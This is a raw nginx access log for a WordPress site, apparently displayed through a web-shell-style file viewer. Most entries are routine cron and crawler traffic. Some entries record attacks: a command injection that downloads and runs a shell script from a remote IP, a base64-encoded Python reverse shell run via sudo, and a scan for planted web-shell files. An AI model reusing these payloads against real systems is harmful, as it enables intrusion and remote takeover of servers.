HEX
Server: nginx/1.16.1
System: Linux ecs-04358622 4.19.90-2107.6.0.0100.oe1.bclinux.x86_64 #1 SMP Wed Dec 1 19:59:44 CST 2021 x86_64
User: nginx (994)
PHP: 8.0.0
Disabled: NONE
Upload Files
File: /home/logs/cqqizhou_access_2026-01-25.log
36.133.115.36 - - [25/Jan/2026:00:00:06 +0800] "POST /wp-cron.php?doing_wp_cron=1769270406.2020170688629150390625 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
51.195.244.77 - - [25/Jan/2026:00:00:06 +0800] "GET /robots.txt HTTP/1.1" 200 190 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
36.133.115.36 - - [25/Jan/2026:00:00:10 +0800] "POST /wp-cron.php?doing_wp_cron=1769270410.3066849708557128906250 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
51.195.215.122 - - [25/Jan/2026:00:00:10 +0800] "GET /portfolio-category/pickled-coil/ HTTP/1.1" 301 5 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
185.191.171.10 - - [25/Jan/2026:00:03:02 +0800] "GET /news/page/2/ HTTP/1.1" 200 25466 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
36.133.115.36 - - [25/Jan/2026:00:08:07 +0800] "POST /wp-cron.php?doing_wp_cron=1769270887.4003219604492187500000 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
95.214.54.147 - - [25/Jan/2026:00:08:07 +0800] "GET / HTTP/1.1" 200 157416 "-" "Mozilla/5.0"
36.133.115.36 - - [25/Jan/2026:00:14:39 +0800] "POST /wp-cron.php?doing_wp_cron=1769271279.1781051158905029296875 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
52.167.144.25 - - [25/Jan/2026:00:14:39 +0800] "GET /?s= HTTP/1.1" 200 19680 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
103.19.190.182 - - [25/Jan/2026:00:16:47 +0800] "GET /Public/admin/hui/lib/webuploader/0.1.5/server/preview.php HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
103.19.190.182 - - [25/Jan/2026:00:16:47 +0800] "GET /Public/admin/hui/lib/webuploader/0.1.5/server/fileupload.php HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
36.133.115.36 - - [25/Jan/2026:00:26:53 +0800] "POST /wp-cron.php?doing_wp_cron=1769272013.7205159664154052734375 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
36.24.82.126 - - [25/Jan/2026:00:26:53 +0800] "GET /Ly9jcXFpemhvdS5jb20vd3AtY29udGVudC91cGxvYWRzLzIwMjYvMDEvMTc2ODI4MDI3MC1hbnF1YW5fU2xpZGVyXzM4NDDDlzIxNjBfMjAyNjAxMTQtc2NhbGVkLndlYnA= HTTP/1.1" 404 8950 "-" "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.39"
125.109.62.200 - - [25/Jan/2026:00:27:02 +0800] "GET /Ly9jcXFpemhvdS5jb20vd3AtY29udGVudC91cGxvYWRzLzIwMjYvMDEvMTc2ODI3NjExOS1xaXpob3VqaWFnb25nX1NsaWRlcl8zODQww5cyMTYwXzIwMjYwMTEzLXNjYWxlZC53ZWJw HTTP/1.1" 404 8950 "-" "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.97"
36.133.115.36 - - [25/Jan/2026:00:39:50 +0800] "POST /wp-cron.php?doing_wp_cron=1769272790.4558498859405517578125 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
204.76.203.49 - - [25/Jan/2026:00:39:50 +0800] "POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd+%2Ftmp%3Bwget+http%3A%2F%2F204.76.203.49%2Fd.sh%3Bchmod+777+d.sh%3B.%2Fd.sh+27telnet%3Brm+-f+d.sh HTTP/1.1" 404 31367 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
36.133.115.36 - - [25/Jan/2026:00:49:20 +0800] "POST /wp-cron.php?doing_wp_cron=1769273360.0069770812988281250000 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
5.61.209.92 - - [25/Jan/2026:00:49:20 +0800] "GET /SDK/webLanguage HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [25/Jan/2026:00:51:34 +0800] "POST /wp-cron.php?doing_wp_cron=1769273494.6113610267639160156250 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
204.76.203.49 - - [25/Jan/2026:00:51:34 +0800] "POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd+%2Ftmp%3Bwget+http%3A%2F%2F204.76.203.49%2Fd.sh%3Bchmod+777+d.sh%3B.%2Fd.sh+27telnet%3Brm+-f+d.sh HTTP/1.1" 404 31367 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
95.214.54.147 - - [25/Jan/2026:00:51:48 +0800] "GET / HTTP/1.1" 200 157416 "-" "Mozilla/5.0"
36.133.115.36 - - [25/Jan/2026:01:08:39 +0800] "POST /wp-cron.php?doing_wp_cron=1769274519.8262689113616943359375 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
194.187.178.126 - - [25/Jan/2026:01:08:39 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0"
194.187.178.110 - - [25/Jan/2026:01:08:40 +0800] "GET / HTTP/1.1" 200 40638 "http://36.133.115.36:80/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0"
36.133.115.36 - - [25/Jan/2026:01:09:55 +0800] "POST /wp-cron.php?doing_wp_cron=1769274595.8232328891754150390625 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
64.89.161.201 - admin [25/Jan/2026:01:09:55 +0800] "POST /goform/sysTools HTTP/1.1" 404 8951 "-" "Go-http-client/1.1"
64.89.161.201 - - [25/Jan/2026:01:09:57 +0800] "GET / HTTP/1.1" 301 5 "-" "Go-http-client/1.1"
64.89.161.201 - - [25/Jan/2026:01:09:58 +0800] "GET / HTTP/1.1" 200 40638 "http://36.133.115.36" "Go-http-client/1.1"
64.89.161.201 - - [25/Jan/2026:01:09:59 +0800] "GET /worker/cpu_profile?pid=3354&ip=36.133.115.36&duration=5&native=0&format=`echo cHl0aG9uMyAtYyAnaW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pO3MuY29ubmVjdCgoIjEwLjAuMC4xIiw0NDQ0KSk7b3MuZHVwMihzLmZpbGVubygpLDApOyBvcy5kdXAyKHMuZmlsZW5vKCksMSk7b3MuZHVwMihzLmZpbGVubygpLDIpO2ltcG9ydCBwdHk7IHB0eS5zcGF3bigiL2Jpbi9iYXNoIikn | base64 -d | sudo sh` HTTP/1.1" 404 8951 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0"
36.133.115.36 - - [25/Jan/2026:01:18:09 +0800] "POST /wp-cron.php?doing_wp_cron=1769275089.2468678951263427734375 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
141.11.213.161 - - [25/Jan/2026:01:18:09 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 15_7_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/26.0 Safari/605.1.15"
141.11.213.161 - - [25/Jan/2026:01:18:10 +0800] "GET / HTTP/1.1" 200 40638 "http://36.133.115.36/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 15_7_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/26.0 Safari/605.1.15"
129.226.174.80 - - [25/Jan/2026:01:18:14 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
129.226.174.80 - - [25/Jan/2026:01:18:16 +0800] "GET / HTTP/1.1" 200 34739 "http://36.133.115.36" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [25/Jan/2026:01:26:11 +0800] "POST /wp-cron.php?doing_wp_cron=1769275571.9252049922943115234375 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
36.133.108.119 - - [25/Jan/2026:01:26:11 +0800] "HEAD /login HTTP/1.1" 302 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27"
36.133.115.36 - - [25/Jan/2026:01:29:22 +0800] "POST /wp-cron.php?doing_wp_cron=1769275762.5439400672912597656250 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
204.76.203.219 - - [25/Jan/2026:01:29:22 +0800] "GET / HTTP/1.1" 200 34740 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
87.121.84.125 - - [25/Jan/2026:01:35:18 +0800] "GET /bitrix/wp-content.php HTTP/1.1" 404 27 "-" "ALittle Client"
36.133.115.36 - - [25/Jan/2026:01:35:21 +0800] "POST /wp-cron.php?doing_wp_cron=1769276121.8595950603485107421875 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
115.159.33.43 - - [25/Jan/2026:01:35:21 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36"
36.133.115.36 - - [25/Jan/2026:01:43:41 +0800] "POST /wp-cron.php?doing_wp_cron=1769276621.2197360992431640625000 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
95.214.54.147 - - [25/Jan/2026:01:43:41 +0800] "GET / HTTP/1.1" 200 157416 "-" "Mozilla/5.0"
40.69.27.251 - - [25/Jan/2026:01:44:16 +0800] "GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:16 +0800] "GET /n3.php HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:16 +0800] "GET /gwmy.php HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:16 +0800] "GET //n3.php HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:17 +0800] "GET //gwmy.php HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:17 +0800] "GET /ccs.php HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:17 +0800] "GET /about8.php HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:17 +0800] "GET /fortest.php HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:18 +0800] "GET //ccs.php HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:18 +0800] "GET //about8.php HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:18 +0800] "GET //fortest.php HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:18 +0800] "GET /xvde.php HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:18 +0800] "GET /itil.php HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:19 +0800] "GET /f355.php HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:19 +0800] "GET /bgymj.php HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:19 +0800] "GET /nf.php HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:19 +0800] "GET //lala.php HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:20 +0800] "GET /3r.php HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:20 +0800] "GET /8xyz.php HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:20 +0800] "GET /la.php HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:20 +0800] "GET /ioxi.php HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:21 +0800] "GET /xpwer1.php HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:21 +0800] "GET //about.php HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:21 +0800] "GET /wp-admin/images/commentv.php HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:21 +0800] "GET //la.php HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:21 +0800] "GET //cgi-bin/index.php HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:22 +0800] "GET //admin.php HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:22 +0800] "GET /wp-includes/fonts/index.php?p= HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:22 +0800] "GET //wp-admin/images/wp-conflg.php?p= HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:22 +0800] "GET /info.php HTTP/1.1" 200 29 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:23 +0800] "GET /about.php HTTP/1.1" 404 27 "-" "-"
36.133.115.36 - - [25/Jan/2026:01:44:24 +0800] "POST /wp-cron.php?doing_wp_cron=1769276664.2093110084533691406250 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
40.69.27.251 - - [25/Jan/2026:01:44:24 +0800] "GET /x/ HTTP/1.1" 404 31367 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:24 +0800] "GET /ss1.php HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:24 +0800] "GET //assets/css/index.php?p= HTTP/1.1" 404 27 "-" "-"
43.166.136.24 - - [25/Jan/2026:01:44:25 +0800] "GET /wp-content/uploads/2025/07/1753456770- HTTP/1.1" 404 8951 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
40.69.27.251 - - [25/Jan/2026:01:44:25 +0800] "GET //goods.php HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:25 +0800] "GET //admin.php?fm=true HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:25 +0800] "GET /222.php HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:25 +0800] "GET /abcd.php HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:26 +0800] "GET /wp-includes/blocks/code/ HTTP/1.1" 403 146 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:26 +0800] "GET //adminfuns.php HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:26 +0800] "GET /ioxi-o.php HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:26 +0800] "GET /wp-content/ HTTP/1.1" 200 5 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:27 +0800] "GET /goat.php HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:27 +0800] "GET /wp-includes/PHPMailer/ HTTP/1.1" 403 146 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:27 +0800] "GET /xx.php HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:28 +0800] "GET /.well-known/ HTTP/1.1" 404 31367 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:28 +0800] "GET /wp-admin/js/wp-conflg.php?p= HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:29 +0800] "GET /f5.php HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:29 +0800] "GET /doc.php HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:29 +0800] "GET /xtride.php HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:29 +0800] "GET /flower.php HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:30 +0800] "GET /flower2.php HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:30 +0800] "GET //f6.php HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:30 +0800] "GET //edit.php HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:30 +0800] "GET //aa.php HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:31 +0800] "GET /ext.php HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:31 +0800] "GET //wp-includes/js/dist/ HTTP/1.1" 403 146 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:31 +0800] "GET /wp-includes/SimplePie/ HTTP/1.1" 403 146 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:31 +0800] "GET //av.php HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:31 +0800] "GET /wp-includes/Text/Diff/Engine/about.php HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:32 +0800] "GET /wsd.php HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:32 +0800] "GET //wp-content/themes/deeto/login.php HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:32 +0800] "GET /classwithtostring.php HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:32 +0800] "GET /file48.php HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:33 +0800] "GET /wp-admin/css/colors/blue/index.php HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:33 +0800] "GET /css.php HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:33 +0800] "GET /alfa.php HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:33 +0800] "GET /wen.php HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:34 +0800] "GET /x.php HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:34 +0800] "GET /xxxx.php HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:34 +0800] "GET //class.php HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:34 +0800] "GET /wp-admin/css/colors/midnight/about.php?p= HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:34 +0800] "GET /gec.php HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:35 +0800] "GET /f35.php HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:36 +0800] "GET /wp-admin/about.php HTTP/1.1" 302 5 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:36 +0800] "GET /wp-login.php?redirect_to=http%3A%2F%2Fcqqizhou.com%2Fwp-admin%2Fabout.php&reauth=1 HTTP/1.1" 200 9062 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:37 +0800] "GET /pp.php HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:37 +0800] "GET /update/f35.php HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:37 +0800] "GET /wp-content/themes/about.php HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:37 +0800] "GET //lock360.php HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:38 +0800] "GET //galex.php HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:38 +0800] "GET /as.php HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:38 +0800] "GET /class-t.api.php HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:38 +0800] "GET /bipas.php HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:39 +0800] "GET /shoyo.php HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:39 +0800] "GET /admin.php HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:39 +0800] "GET /ar.php HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:39 +0800] "GET /blurbs18.php HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:39 +0800] "GET /radio.php HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:40 +0800] "GET /wp-good.php HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:40 +0800] "GET /bless14.php HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:40 +0800] "GET /d2.php HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:40 +0800] "GET /.well-known/gecko-litespeed.php HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:41 +0800] "GET /wp-admin/maint/about.php HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:41 +0800] "GET /wp-content/admin.php HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:42 +0800] "GET /wp-admin/setup-config.php HTTP/1.1" 409 2667 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:42 +0800] "GET /wp-includes/ID3/about.php?p= HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:42 +0800] "GET /.well-known/admin.php HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:42 +0800] "GET /wp-includes/customize/about.php HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:42 +0800] "GET /wp-content/plugins/pwnd/as.php HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:43 +0800] "GET /zwso.php HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:43 +0800] "GET /d1.php HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:43 +0800] "GET /bless.php HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:44 +0800] "GET /X7x.php HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:44 +0800] "GET /class20.php HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:44 +0800] "GET /lock360.php HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:44 +0800] "GET //wp-content/themes/about.php HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:45 +0800] "GET /themes.php HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:45 +0800] "GET /gifclass4.php HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:45 +0800] "GET /wag.php HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:45 +0800] "GET /xvent.php HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:46 +0800] "GET /wp-aaa.php HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:46 +0800] "GET /ut.php HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:46 +0800] "GET /class19.php HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:46 +0800] "GET /ooo.php HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:47 +0800] "GET /166.php HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:47 +0800] "GET /bypass.php HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:47 +0800] "GET /plss3.php HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:47 +0800] "GET /atomlib.php HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:47 +0800] "GET /we.php HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:48 +0800] "GET /t.php HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:48 +0800] "GET /bp.php HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:49 +0800] "GET /wp-admin/user/about.php HTTP/1.1" 302 5 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:50 +0800] "GET /wp-login.php?redirect_to=http%3A%2F%2Fcqqizhou.com%2Fwp-admin%2Fuser%2Fabout.php&reauth=1 HTTP/1.1" 200 9067 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:50 +0800] "GET /geck.php HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:50 +0800] "GET /wpc.php?p= HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:50 +0800] "GET /gecko.php HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:51 +0800] "GET /a.php HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:51 +0800] "GET /admins.php HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:51 +0800] "GET /wp-configs.php HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:51 +0800] "GET /thai.php HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:52 +0800] "GET /wp.php HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:52 +0800] "GET /fclas.php HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:52 +0800] "GET /main.php HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:52 +0800] "GET /a1.php HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:53 +0800] "GET /class.1.php HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:53 +0800] "GET /lala.php HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:53 +0800] "GET /tox.php HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:53 +0800] "GET /gg.php HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:53 +0800] "GET /aaa.php HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:54 +0800] "GET /a2.php HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:54 +0800] "GET /wp-content/upgrade/about.php HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:54 +0800] "GET /index/function.php HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:54 +0800] "GET /ee.php HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:55 +0800] "GET /alfanew.php HTTP/1.1" 404 27 "-" "-"
40.69.27.251 - - [25/Jan/2026:01:44:55 +0800] "GET /admin/function.php HTTP/1.1" 404 27 "-" "-"
